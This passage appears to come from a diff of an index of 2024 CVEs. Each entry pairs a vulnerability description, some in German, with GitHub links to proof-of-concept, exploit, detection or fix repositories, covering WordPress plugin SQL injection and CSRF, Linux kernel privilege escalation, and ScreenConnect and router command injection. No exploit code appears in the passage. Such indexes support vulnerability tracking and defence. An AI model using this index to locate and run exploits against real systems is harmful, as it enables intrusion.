Funktion FileServer::userFormImage der Datei server/application/api/controller/File.php der Komponente HTTP POST Request Handler. Mit der Manipulation des Arguments file mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [Cappricio-Securities/CVE-2024-0352](https://github.com/Cappricio-Securities/CVE-2024-0352) + +### CVE-2024-0379 (2024-02-20) + +The Custom Twitter Feeds – A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0379](https://github.com/kodaichodai/CVE-2024-0379) + +### CVE-2024-0399 (2024-04-15) + +The WooCommerce Customers Manager WordPress plugin before 29.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role. + + +- [xbz0n/CVE-2024-0399](https://github.com/xbz0n/CVE-2024-0399) + +### CVE-2024-0507 (2024-01-16) + +An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13 This vulnerability was reported via the GitHub Bug Bounty program. + + +- [convisolabs/CVE-2024-0507_CVE-2024-0200-github](https://github.com/convisolabs/CVE-2024-0507_CVE-2024-0200-github) + +### CVE-2024-0509 (2024-02-05) + +The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0509](https://github.com/kodaichodai/CVE-2024-0509) + +### CVE-2024-0566 (2024-02-12) + +The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. + + +- [xbz0n/CVE-2024-0566](https://github.com/xbz0n/CVE-2024-0566) + +### CVE-2024-0582 (2024-01-16) + +A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system. + + +- [ysanatomic/io_uring_LPE-CVE-2024-0582](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582) +- [Forsaken0129/CVE-2024-0582](https://github.com/Forsaken0129/CVE-2024-0582) +- [0ptyx/cve-2024-0582](https://github.com/0ptyx/cve-2024-0582) +- [geniuszlyy/CVE-2024-0582](https://github.com/geniuszlyy/CVE-2024-0582) + +### CVE-2024-0588 (2024-04-09) + +The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing nonce validation on the pmpro_lifter_save_streamline_option() function. This makes it possible for unauthenticated attackers to enable the streamline setting with Lifter LMS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0588](https://github.com/kodaichodai/CVE-2024-0588) + +### CVE-2024-0590 (2024-02-20) + +The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0590](https://github.com/kodaichodai/CVE-2024-0590) + +### CVE-2024-0623 (2024-01-20) + +The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0623](https://github.com/kodaichodai/CVE-2024-0623) + +### CVE-2024-0624 (2024-01-25) + +The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0624](https://github.com/kodaichodai/CVE-2024-0624) + +### CVE-2024-0679 (2024-01-20) + +The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins. + + +- [RandomRobbieBF/CVE-2024-0679](https://github.com/RandomRobbieBF/CVE-2024-0679) + +### CVE-2024-0684 (2024-02-06) + +A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service. + + +- [Valentin-Metz/writeup_split](https://github.com/Valentin-Metz/writeup_split) + +### CVE-2024-0710 (2024-05-02) + +The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context. + + +- [karlemilnikka/CVE-2024-0710](https://github.com/karlemilnikka/CVE-2024-0710) + +### CVE-2024-0713 +- [kitodd/CVE-2024-0713](https://github.com/kitodd/CVE-2024-0713) + +### CVE-2024-0741 (2024-01-23) + +An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. + + +- [HyHy100/Firefox-ANGLE-CVE-2024-0741](https://github.com/HyHy100/Firefox-ANGLE-CVE-2024-0741) + +### CVE-2024-0757 (2024-06-04) + +The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files + + +- [hunThubSpace/CVE-2024-0757-Exploit](https://github.com/hunThubSpace/CVE-2024-0757-Exploit) + +### CVE-2024-0762 (2024-05-14) + +Potential buffer overflow \nin unsafe UEFI variable handling \n\nin Phoenix SecureCore™ for select Intel platforms\n\nThis issue affects:\n\nPhoenix \n\nSecureCore™ for Intel Kaby Lake: from 4.0.1.1 before 4.0.1.998;\n\nPhoenix \n\nSecureCore™ for Intel Coffee Lake: from 4.1.0.1 before 4.1.0.562;\n\nPhoenix \n\nSecureCore™ for Intel Ice Lake: from 4.2.0.1 before 4.2.0.323;\n\nPhoenix \n\nSecureCore™ for Intel Comet Lake: from 4.2.1.1 before 4.2.1.287;\n\nPhoenix \n\nSecureCore™ for Intel Tiger Lake: from 4.3.0.1 before 4.3.0.236;\n\nPhoenix \n\nSecureCore™ for Intel Jasper Lake: from 4.3.1.1 before 4.3.1.184;\n\nPhoenix \n\nSecureCore™ for Intel Alder Lake: from 4.4.0.1 before 4.4.0.269;\n\nPhoenix \n\nSecureCore™ for Intel Raptor Lake: from 4.5.0.1 before 4.5.0.218;\n\nPhoenix \n\nSecureCore™ for Intel Meteor Lake: from 4.5.1.1 before 4.5.1.15.\n\n + + +- [tadash10/Detect-CVE-2024-0762](https://github.com/tadash10/Detect-CVE-2024-0762) + +### CVE-2024-0783 (2024-01-22) + +Eine kritische Schwachstelle wurde in Project Worlds Online Admission System 1.0 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei documents.php. Durch Manipulieren mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [keru6k/Online-Admission-System-RCE-PoC](https://github.com/keru6k/Online-Admission-System-RCE-PoC) + +### CVE-2024-0944 (2024-01-26) + +Eine problematische Schwachstelle wurde in Totolink T8 4.1.5cu.833_20220905 ausgemacht. Betroffen davon ist ein unbekannter Prozess der Datei /cgi-bin/cstecgi.cgi. Mit der Manipulation mit unbekannten Daten kann eine session expiration-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Die Komplexität eines Angriffs ist eher hoch. Sie ist schwierig ausnutzbar. Der Exploit steht zur öffentlichen Verfügung. + + +- [Artemisxxx37/cve-2024-0944](https://github.com/Artemisxxx37/cve-2024-0944) + +### CVE-2024-0986 (2024-01-28) + +Eine Schwachstelle wurde in Issabel PBX 4.0.0 ausgemacht. Sie wurde als kritisch eingestuft. Es geht hierbei um eine nicht näher spezifizierte Funktion der Datei /index.php?menu=asterisk_cli der Komponente Asterisk-Cli. Durch Beeinflussen des Arguments Command mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated](https://github.com/gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated) + +### CVE-2024-1071 (2024-03-13) + +The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [gbrsh/CVE-2024-1071](https://github.com/gbrsh/CVE-2024-1071) +- [Trackflaw/CVE-2024-1071-Docker](https://github.com/Trackflaw/CVE-2024-1071-Docker) +- [Matrexdz/CVE-2024-1071](https://github.com/Matrexdz/CVE-2024-1071) +- [Matrexdz/CVE-2024-1071-Docker](https://github.com/Matrexdz/CVE-2024-1071-Docker) +- [gh-ost00/CVE-2024-1071-SQL-Injection](https://github.com/gh-ost00/CVE-2024-1071-SQL-Injection) +- [Dogu589/WordPress-Exploit-CVE-2024-1071](https://github.com/Dogu589/WordPress-Exploit-CVE-2024-1071) +- [Spid3heX/CVE-2024-1071-PoC-Script](https://github.com/Spid3heX/CVE-2024-1071-PoC-Script) + +### CVE-2024-1086 (2024-01-31) + +A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n + + +- [Notselwyn/CVE-2024-1086](https://github.com/Notselwyn/CVE-2024-1086) +- [Alicey0719/docker-POC_CVE-2024-1086](https://github.com/Alicey0719/docker-POC_CVE-2024-1086) +- [CCIEVoice2009/CVE-2024-1086](https://github.com/CCIEVoice2009/CVE-2024-1086) +- [kevcooper/CVE-2024-1086-checker](https://github.com/kevcooper/CVE-2024-1086-checker) +- [feely666/CVE-2024-1086](https://github.com/feely666/CVE-2024-1086) +- [xzx482/CVE-2024-1086](https://github.com/xzx482/CVE-2024-1086) + +### CVE-2024-1112 (2024-01-31) + +Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument. + + +- [enessakircolak/CVE-2024-1112](https://github.com/enessakircolak/CVE-2024-1112) + +### CVE-2024-1207 (2024-02-08) + +The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [sahar042/CVE-2024-1207](https://github.com/sahar042/CVE-2024-1207) + +### CVE-2024-1208 (2024-02-05) + +The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions. + + +- [karlemilnikka/CVE-2024-1208-and-CVE-2024-1210](https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210) +- [Cappricio-Securities/CVE-2024-1208](https://github.com/Cappricio-Securities/CVE-2024-1208) + +### CVE-2024-1209 (2024-02-05) + +The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads. + + +- [karlemilnikka/CVE-2024-1209](https://github.com/karlemilnikka/CVE-2024-1209) + +### CVE-2024-1212 (2024-02-21) + +Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n\n\n + + +- [Chocapikk/CVE-2024-1212](https://github.com/Chocapikk/CVE-2024-1212) +- [nak000/CVE-2024-1212](https://github.com/nak000/CVE-2024-1212) + +### CVE-2024-1269 (2024-02-07) + +In SourceCodester Product Management System 1.0 wurde eine problematische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei /supplier.php. Dank Manipulation des Arguments supplier_name/supplier_contact mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [sajaljat/CVE-2024-1269](https://github.com/sajaljat/CVE-2024-1269) + +### CVE-2024-1301 (2024-03-12) + +SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database. + + +- [guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection](https://github.com/guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection) + +### CVE-2024-1302 (2024-03-12) + +Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file obtaining all sensitive information such as database credentials. + + +- [guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure](https://github.com/guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure) + +### CVE-2024-1303 (2024-03-12) + +Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows an authenticated attacker to retrieve any file from the device using the download-file functionality. + + +- [guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal](https://github.com/guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal) + +### CVE-2024-1304 (2024-03-12) + +Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted javascript payload to an authenticated user and partially hijack their browser session. + + +- [guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS](https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS) + +### CVE-2024-1346 (2024-02-19) + +Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants. + + +- [PeterGabaldon/CVE-2024-1346](https://github.com/PeterGabaldon/CVE-2024-1346) + +### CVE-2024-1380 (2024-03-13) + +The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is. + + +- [RandomRobbieBF/CVE-2024-1380](https://github.com/RandomRobbieBF/CVE-2024-1380) + +### CVE-2024-1403 (2024-02-27) + +In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified.  The\nvulnerability is a bypass to authentication based on a failure to properly\nhandle username and password. Certain unexpected\ncontent passed into the credentials can lead to unauthorized access without proper\nauthentication.   \n\n\n\n\n\n\n + + +- [horizon3ai/CVE-2024-1403](https://github.com/horizon3ai/CVE-2024-1403) + +### CVE-2024-1441 (2024-03-11) + +An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash. + + +- [almkuznetsov/CVE-2024-1441](https://github.com/almkuznetsov/CVE-2024-1441) + +### CVE-2024-1512 (2024-02-17) + +The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [rat-c/CVE-2024-1512](https://github.com/rat-c/CVE-2024-1512) + +### CVE-2024-1561 (2024-04-16) + +An issue was discovered in gradio-app/gradio, where the `/component_server` endpoint improperly allows the invocation of any method on a `Component` class with attacker-controlled arguments. Specifically, by exploiting the `move_resource_to_block_cache()` method of the `Block` class, an attacker can copy any file on the filesystem to a temporary directory and subsequently retrieve it. This vulnerability enables unauthorized local file read access, posing a significant risk especially when the application is exposed to the internet via `launch(share=True)`, thereby allowing remote attackers to read files on the host machine. Furthermore, gradio apps hosted on `huggingface.co` are also affected, potentially leading to the exposure of sensitive information such as API keys and credentials stored in environment variables. + + +- [DiabloHTB/CVE-2024-1561](https://github.com/DiabloHTB/CVE-2024-1561) +- [DiabloHTB/Nuclei-Template-CVE-2024-1561](https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561) + +### CVE-2024-1651 (2024-02-19) + +Torrentpier version 2.4.1 allows executing arbitrary commands on the server.\n\nThis is possible because the application is vulnerable to insecure deserialization.\n\n\n\n\n + + +- [sharpicx/CVE-2024-1651-PoC](https://github.com/sharpicx/CVE-2024-1651-PoC) +- [hy011121/CVE-2024-1651-exploit-RCE](https://github.com/hy011121/CVE-2024-1651-exploit-RCE) +- [Whiteh4tWolf/CVE-2024-1651-PoC](https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC) + +### CVE-2024-1655 (2024-04-15) + +Certain ASUS WiFi routers models has an OS Command Injection vulnerability, allowing an authenticated remote attacker to execute arbitrary system commands by sending a specially crafted request. + + +- [lnversed/CVE-2024-1655](https://github.com/lnversed/CVE-2024-1655) + +### CVE-2024-1698 (2024-02-27) + +The NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [kamranhasan/CVE-2024-1698-Exploit](https://github.com/kamranhasan/CVE-2024-1698-Exploit) +- [shanglyu/CVE-2024-1698](https://github.com/shanglyu/CVE-2024-1698) +- [jesicatjan/WordPress-NotificationX-CVE-2024-1698](https://github.com/jesicatjan/WordPress-NotificationX-CVE-2024-1698) + +### CVE-2024-1709 (2024-02-21) + +ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel\n\n vulnerability, which may allow an attacker direct access to confidential information or \n\ncritical systems.\n\n + + +- [W01fh4cker/ScreenConnect-AuthBypass-RCE](https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE) +- [HussainFathy/CVE-2024-1709](https://github.com/HussainFathy/CVE-2024-1709) +- [sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass](https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass) +- [cjybao/CVE-2024-1709-and-CVE-2024-1708](https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708) +- [AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-](https://github.com/AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-) +- [AMRICHASFUCK/Mass-CVE-2024-1709](https://github.com/AMRICHASFUCK/Mass-CVE-2024-1709) + +### CVE-2024-1781 (2024-02-23) + +Eine Schwachstelle wurde in Totolink X6000R AX3000 9.4.0cu.852_20230719 ausgemacht. Sie wurde als kritisch eingestuft. Betroffen davon ist die Funktion setWizardCfg der Datei /cgi-bin/cstecgi.cgi der Komponente shttpd. Dank der Manipulation mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [Icycu123/CVE-2024-1781](https://github.com/Icycu123/CVE-2024-1781) + +### CVE-2024-1874 (2024-04-29) + +In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell. \n\n + + +- [ox1111/-CVE-2024-1874-](https://github.com/ox1111/-CVE-2024-1874-) +- [Tgcohce/CVE-2024-1874](https://github.com/Tgcohce/CVE-2024-1874) + +### CVE-2024-1931 (2024-03-07) + +NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely. + + +- [passer12/CVE-2024-1931-reproduction](https://github.com/passer12/CVE-2024-1931-reproduction) + +### CVE-2024-1939 (2024-02-29) + +Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [rycbar77/CVE-2024-1939](https://github.com/rycbar77/CVE-2024-1939) + +### CVE-2024-2054 (2024-03-05) + +The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. + + +- [Madan301/CVE-2024-2054](https://github.com/Madan301/CVE-2024-2054) + +### CVE-2024-2074 (2024-03-01) + +Eine kritische Schwachstelle wurde in Mini-Tmall bis 20231017 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei ?r=tmall/admin/user/1/1. Mit der Manipulation des Arguments orderBy mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [yuziiiiiiiiii/CVE-2024-2074](https://github.com/yuziiiiiiiiii/CVE-2024-2074) + +### CVE-2024-2169 (2024-03-19) + +Implementations of UDP application protocol are vulnerable to network loops. An unauthenticated attacker can use maliciously-crafted packets against a vulnerable implementation that can lead to Denial of Service (DOS) and/or abuse of resources. + + +- [douglasbuzatto/G3-Loop-DoS](https://github.com/douglasbuzatto/G3-Loop-DoS) + +### CVE-2024-2188 (2024-03-05) + +Cross-Site Scripting (XSS) vulnerability stored in TP-Link Archer AX50 affecting firmware version 1.0.11 build 2022052. This vulnerability could allow an unauthenticated attacker to create a port mapping rule via a SOAP request and store a malicious JavaScript payload within that rule, which could result in an execution of the JavaScript payload when the rule is loaded. + + +- [hacefresko/CVE-2024-2188](https://github.com/hacefresko/CVE-2024-2188) + +### CVE-2024-2193 (2024-03-15) + +A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths. + + +- [uthrasri/CVE-2024-2193](https://github.com/uthrasri/CVE-2024-2193) + +### CVE-2024-2242 (2024-03-13) + +The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘active-tab’ parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + + +- [RandomRobbieBF/CVE-2024-2242](https://github.com/RandomRobbieBF/CVE-2024-2242) + +### CVE-2024-2257 (2024-05-10) + +This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to improper implementation of password policies. An attacker with physical access could exploit this by creating password that do not adhere to the defined security standards/policy on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to expose the router to potential security threats. + + +- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257) + +### CVE-2024-2389 (2024-04-02) + +In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified.  An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n\n + + +- [adhikara13/CVE-2024-2389](https://github.com/adhikara13/CVE-2024-2389) + +### CVE-2024-2432 (2024-03-13) + +A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition. + + +- [Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP](https://github.com/Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP) + +### CVE-2024-2667 (2024-05-02) + +The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files. + + +- [Puvipavan/CVE-2024-2667](https://github.com/Puvipavan/CVE-2024-2667) + +### CVE-2024-2876 (2024-05-02) + +The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [c0d3zilla/CVE-2024-2876](https://github.com/c0d3zilla/CVE-2024-2876) +- [Quantum-Hacker/CVE-2024-2876](https://github.com/Quantum-Hacker/CVE-2024-2876) +- [0xAgun/CVE-2024-2876](https://github.com/0xAgun/CVE-2024-2876) +- [skyrowalker/CVE-2024-2876](https://github.com/skyrowalker/CVE-2024-2876) +- [issamjr/CVE-2024-2876](https://github.com/issamjr/CVE-2024-2876) + +### CVE-2024-2879 (2024-04-03) + +The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [herculeszxc/CVE-2024-2879](https://github.com/herculeszxc/CVE-2024-2879) + +### CVE-2024-2887 (2024-03-26) + +Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) + + +- [PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC](https://github.com/PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC) +- [rycbar77/CVE-2024-2887](https://github.com/rycbar77/CVE-2024-2887) + +### CVE-2024-2928 (2024-06-06) + +A Local File Inclusion (LFI) vulnerability was identified in mlflow/mlflow, specifically in version 2.9.2, which was fixed in version 2.11.3. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../'. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system, including sensitive files like '/etc/passwd'. The vulnerability is a bypass to a previous patch that only addressed similar manipulation within the URI's query string, highlighting the need for comprehensive validation of all parts of a URI to prevent LFI attacks. + + +- [nuridincersaygili/CVE-2024-2928](https://github.com/nuridincersaygili/CVE-2024-2928) + +### CVE-2024-2961 (2024-04-17) + +The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.\n + + +- [mattaperkins/FIX-CVE-2024-2961](https://github.com/mattaperkins/FIX-CVE-2024-2961) +- [rvizx/CVE-2024-2961](https://github.com/rvizx/CVE-2024-2961) +- [ambionics/cnext-exploits](https://github.com/ambionics/cnext-exploits) +- [absolutedesignltd/iconvfix](https://github.com/absolutedesignltd/iconvfix) +- [exfil0/test_iconv](https://github.com/exfil0/test_iconv) +- [tnishiox/cve-2024-2961](https://github.com/tnishiox/cve-2024-2961) +- [kjdfklha/CVE-2024-2961_poc](https://github.com/kjdfklha/CVE-2024-2961_poc) + +### CVE-2024-2997 (2024-03-27) + +In Bdtask Multi-Store Inventory Management System bis 20240320 wurde eine problematische Schwachstelle ausgemacht. Hierbei betrifft es unbekannten Programmcode. Durch das 